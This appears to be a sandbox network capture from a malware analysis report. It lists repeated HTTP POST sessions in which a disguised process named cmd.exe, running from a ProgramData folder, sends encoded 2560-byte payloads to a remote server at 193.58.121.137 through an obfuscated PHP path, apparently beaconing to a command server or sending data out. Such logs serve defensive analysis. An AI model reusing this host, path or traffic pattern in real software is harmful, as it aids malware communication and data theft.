Jan 3, 2025 20:48:20.169392109 CET	2560	OUT	Data Raw: 5f 50 5c 5b 5c 43 5a 52 5a 5c 55 51 59 5f 54 54 56 58 5d 43 50 57 5a 5e 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: _P\[\CZRZ\UQY_TTVX]CPWZ^Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%F<0$3!Z'$=Z%(\<V+P&>U#X-64/R?='_!%Y)#
Jan 3, 2025 20:48:20.447428942 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:48:20.576369047 CET	207	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:48:20 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3b 56 5f 56 Data Ascii: ;V_V

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	49912	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:48:20.721343040 CET	397	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2560 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 20:48:21.159338951 CET	2560	OUT	Data Raw: 5f 57 59 58 5c 44 5a 55 5a 5c 55 51 59 5d 54 55 56 51 5d 45 50 55 5a 59 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: _WYX\DZUZ\UQY]TUVQ]EPUZYZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[&< $&'.2?V+%$.*(3?X.5!X"7R<='_!%Y)+
Jan 3, 2025 20:48:21.404231071 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:48:21.538444042 CET	207	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:48:21 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3b 56 5f 56 Data Ascii: ;V_V

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	49922	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:48:21.778984070 CET	397	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2560 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 20:48:22.138236046 CET	2560	OUT	Data Raw: 5f 53 5c 5c 59 42 5a 5a 5a 5c 55 51 59 59 54 53 56 5f 5d 45 50 5d 5a 5d 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: _S\\YBZZZ\UQYYTSV_]EP]Z]Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[&?300%1%]&<?>.7U)7"U%.*3+Y:%=X7/T)-'_!%Y)
Jan 3, 2025 20:48:22.429534912 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:48:22.576776028 CET	207	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:48:22 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3b 56 5f 56 Data Ascii: ;V_V

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	49923	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:48:21.895337105 CET	397	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 1884 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 20:48:22.247587919 CET	1884	OUT	Data Raw: 5f 53 59 5e 59 43 5a 54 5a 5c 55 51 59 59 54 56 56 5c 5d 43 50 5d 5a 53 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: _SY^YCZTZ\UQYYTVV\]CP]ZSZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%@?']0>&'1+-T(4$.*>33Z,5)]#+'_!%Y)
Jan 3, 2025 20:48:22.518940926 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:48:22.670315027 CET	380	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:48:22 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 09 1e 25 02 33 18 0e 50 27 16 2c 0c 33 3a 2a 19 2b 2f 37 41 39 21 38 5f 21 03 24 0a 2a 1d 3c 5a 3d 3c 23 03 22 01 36 51 21 01 29 11 3c 00 23 5b 03 1d 22 12 35 32 08 13 32 29 32 01 2c 30 02 43 25 2e 21 5e 2b 00 35 15 21 2e 25 0d 35 00 37 0f 2f 1d 3d 1f 30 02 0d 59 3f 3e 26 13 24 05 21 51 00 10 39 55 27 30 3a 06 25 3f 2d 06 31 03 39 59 30 35 30 00 22 3c 3a 51 25 2b 39 12 2c 1c 0a 56 26 31 2c 53 21 55 20 5c 3d 07 2d 13 31 3b 22 5f 2a 01 20 52 00 31 5c 51 Data Ascii: %3P',3:+/7A9!8_!$<Z=<#"6Q!)<#["522)2,0C%.!^+5!.%57/=0Y?>&$!Q9U'0:%?-19Y050"<:Q%+9,V&1,S!U \=-1;"_* R1\Q

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	49929	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:48:22.723807096 CET	373	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2560 Expect: 100-continue
Jan 3, 2025 20:48:23.075786114 CET	2560	OUT	Data Raw: 5a 51 59 5a 59 43 5a 56 5a 5c 55 51 59 5f 54 5b 56 5c 5d 45 50 50 5a 58 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: ZQYZYCZVZ\UQY_T[V\]EPPZXZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[&(0')''-2/3+>;Q(4)2>*959 '?'_!%Y)#
Jan 3, 2025 20:48:23.364413977 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:48:23.492283106 CET	151	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:48:23 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 3b 56 5f 56 Data Ascii: ;V_V

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.4	49935	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:48:23.627346039 CET	373	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2552 Expect: 100-continue
Jan 3, 2025 20:48:23.988461018 CET	2552	OUT	Data Raw: 5f 5f 5c 5c 59 42 5f 55 5a 5c 55 51 59 5e 54 54 56 51 5d 46 50 55 5a 5d 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: __\\YB_UZ\UQY^TTVQ]FPUZ]Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[&?V/X3>:2-%<4<=+$Q2=>)#9547+'_!%Y)
Jan 3, 2025 20:48:24.270412922 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:48:24.402657032 CET	151	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:48:24 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 3b 56 5f 56 Data Ascii: ;V_V

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.4	49946	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:48:25.342700005 CET	397	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2560 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 20:48:25.700766087 CET	2560	OUT	Data Raw: 5a 52 59 58 5c 46 5f 52 5a 5c 55 51 59 59 54 50 56 5d 5d 46 50 52 5a 53 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: ZRYX\F_RZ\UQYYTPV]]FPRZSZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%B+?_3==&7%+=8+>1.">:9#7;<='_!%Y)
Jan 3, 2025 20:48:25.981708050 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:48:26.115055084 CET	207	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:48:25 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3b 56 5f 56 Data Ascii: ;V_V

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.4	49953	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:48:26.317024946 CET	397	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2560 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 20:48:26.669524908 CET	2560	OUT	Data Raw: 5a 56 5c 5c 59 44 5a 52 5a 5c 55 51 59 57 54 55 56 59 5d 47 50 5c 5a 5a 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: ZV\\YDZRZ\UQYWTUVY]GP\ZZZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%+3?X0>'7[%? \>-7P('>%-S*[-!\"'/R+-'_!%Y)
Jan 3, 2025 20:48:26.992120981 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:48:27.129170895 CET	207	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:48:26 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3b 56 5f 56 Data Ascii: ;V_V

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.4	49963	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:48:27.688441992 CET	397	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2560 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 20:48:28.044507980 CET	2560	OUT	Data Raw: 5f 51 5c 5f 59 45 5a 50 5a 5c 55 51 59 56 54 5b 56 5a 5d 49 50 51 5a 59 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: _Q\_YEZPZ\UQYVT[VZ]IPQZYZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[&)3?\02%%,\(=8?'!%>)>U/-&#U)='_!%Y)
Jan 3, 2025 20:48:28.361604929 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:48:28.497051001 CET	207	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:48:28 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3b 56 5f 56 Data Ascii: ;V_V

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.4	49964	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:48:27.691878080 CET	397	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 1868 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 20:48:28.044543982 CET	1868	OUT	Data Raw: 5a 55 59 5a 59 42 5a 5b 5a 5c 55 51 59 5e 54 52 56 50 5d 40 50 5d 5a 5b 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: ZUYZYBZ[Z\UQY^TRVP]@P]Z[Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[&?<':'7)\&<0Y<=<)'!1.) 3[,%^ ,<-'_!%Y)#
Jan 3, 2025 20:48:28.357605934 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:48:28.493041992 CET	380	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:48:28 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 09 1e 26 11 24 36 28 56 27 16 24 0a 24 2a 03 0a 2b 12 09 43 39 21 2c 58 36 3a 2c 0a 29 23 2c 5a 2a 3f 28 5b 22 2f 2a 56 35 11 29 5f 2a 3a 23 5b 03 1d 22 5a 35 31 3a 5b 27 39 0b 5b 2f 20 3c 43 26 2e 35 58 28 07 36 0f 23 00 3e 56 21 07 2b 0d 2c 23 0b 11 30 5a 34 07 2b 5b 3d 03 30 05 21 51 00 10 3a 0e 27 30 2a 05 25 3c 21 07 24 3d 22 00 33 25 30 01 35 02 0f 0b 31 28 22 03 3b 54 24 56 31 1c 3c 57 23 33 3f 03 3d 2a 25 13 32 3b 22 5f 2a 01 20 52 00 31 5c 51 Data Ascii: &$6(V'$$+C9!,X6:,)#,Z?(["/V5)_:#["Z51:['9[/ <C&.5X(6#>V!+,#0Z4+[=0!Q:'0%<!$="3%051(";T$V1<W#3?=%2;"_* R1\Q

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.4	49970	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:48:28.629640102 CET	373	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2552 Expect: 100-continue
Jan 3, 2025 20:48:28.981982946 CET	2552	OUT	Data Raw: 5f 53 5c 5a 59 42 5f 51 5a 5c 55 51 59 5e 54 52 56 5f 5d 40 50 57 5a 5f 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: _S\ZYB_QZ\UQY^TRV_]@PWZ_Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[&?0?'>'':2, Y? ?$Q2X)W*##^. 7)='_!%Y)#
Jan 3, 2025 20:48:29.289935112 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:48:29.439449072 CET	151	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:48:29 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 3b 56 5f 56 Data Ascii: ;V_V

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.4	49977	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:48:29.567708969 CET	397	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2560 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 20:48:29.926165104 CET	2560	OUT	Data Raw: 5f 5e 59 5a 59 4a 5a 51 5a 5c 55 51 59 56 54 5b 56 5b 5d 43 50 51 5a 5b 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: _^YZYJZQZ\UQYVT[V[]CPQZ[Z_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[&<]&."%$9['<,]?>8+7>T&.&)#Z:%\#$+'_!%Y)
Jan 3, 2025 20:48:30.210920095 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:48:30.340120077 CET	207	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:48:30 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3b 56 5f 56 Data Ascii: ;V_V

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.4	49983	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:48:30.483438969 CET	397	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2560 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 20:48:30.841780901 CET	2560	OUT	Data Raw: 5f 51 5c 5e 59 45 5a 5b 5a 5c 55 51 59 59 54 5a 56 5e 5d 47 50 5c 5a 53 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: _Q\^YEZ[Z\UQYYTZV^]GP\ZSZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[%B)0?3.&&7&$[(?P?$"2%SU/Z.: 43)='_!%Y)
Jan 3, 2025 20:48:31.241086006 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:48:31.379453897 CET	207	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:48:31 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3b 56 5f 56 Data Ascii: ;V_V

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.4	49990	193.58.121.137	80	7548	C:\ProgramData\SoftwareDistribution\cmd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 20:48:31.503844976 CET	397	OUT	POST /privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.58.121.137 Content-Length: 2560 Expect: 100-continue Connection: Keep-Alive
Jan 3, 2025 20:48:31.857456923 CET	2560	OUT	Data Raw: 5f 53 5c 53 59 40 5f 51 5a 5c 55 51 59 58 54 51 56 5c 5d 47 50 52 5a 59 5a 5f 59 51 52 56 5a 51 43 5e 5a 5d 5f 5e 51 57 5f 5e 57 52 56 5d 59 5f 55 51 58 53 5c 53 50 52 5e 5c 56 5b 54 55 56 49 5d 58 5f 5c 56 5f 57 53 5d 5f 5c 5f 5a 5b 42 51 54 56 Data Ascii: _S\SY@_QZ\UQYXTQV\]GPRZYZ_YQRVZQC^Z]_^QW_^WRV]Y_UQXS\SPR^\V[TUVI]X_\V_WS]_\_Z[BQTV_\Z]PYPXXP_Z[VS[C\_RCXY[]^X___\EY[ZY]WXT[YTS[P[P_VZV[^CZ_UX[XPU]\^P[Z__Z\U]^RPAU]J[TZV[]UQYZ^UYZUU^Y\[&+?$6&',4]??W)4-&.*Z,5 Q;+='_!%Y)?
Jan 3, 2025 20:48:32.151712894 CET	25	IN	HTTP/1.1 100 Continue
Jan 3, 2025 20:48:32.303177118 CET	207	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 19:48:32 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3b 56 5f 56 Data Ascii: ;V_V

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
